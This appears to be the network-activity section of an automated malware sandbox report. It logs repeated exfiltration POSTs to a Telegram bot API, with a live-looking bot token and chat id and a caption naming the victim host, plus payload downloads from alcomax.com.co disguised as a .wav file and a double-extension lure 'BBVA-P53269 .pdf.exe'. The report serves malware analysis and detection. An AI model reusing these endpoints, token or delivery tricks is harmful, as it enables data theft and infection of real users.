            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-ch
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 568
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-ch
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 601
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-ch
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 568
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-ch
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 601
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-ch
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 601
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-ch
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 568
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-ch
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 601
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-ch
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 568
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-ch
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 601
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-ch
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 568
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-ch
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 568
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-ch
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 601
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-ch
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 568
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-ch
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 568
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-ch
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 601
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 11_2_0045DBF0 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle
            Source: global traffic | HTTP traffic detected:
                GET /Rzbiaxwk.wav HTTP/1.1
                Host: alcomax.com.co
                Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected:
                GET /Rzbiaxwk.wav HTTP/1.1
                Host: alcomax.com.co
                Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected:
                GET / HTTP/1.1
                User-Agent: Project1
                Host: showip.net
            Source: global traffic | HTTP traffic detected:
                GET / HTTP/1.1
                User-Agent: Project1
                Host: showip.net
            Source: global traffic | DNS traffic detected: DNS query: alcomax.com.co
            Source: global traffic | DNS traffic detected: DNS query: showip.net
            Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
            Source: unknown | HTTP traffic detected:
                POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1
                Accept: */*
                Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                Accept-Language: en-ch
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.telegram.org
                Content-Length: 6994
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314628182.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, AllData.exe, 00000009.00000002.1448506731.00000000024B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: InstallUtil.exe, 0000000B.00000002.3748344854.000000000130C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://showip.net/4
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://showip.net/=
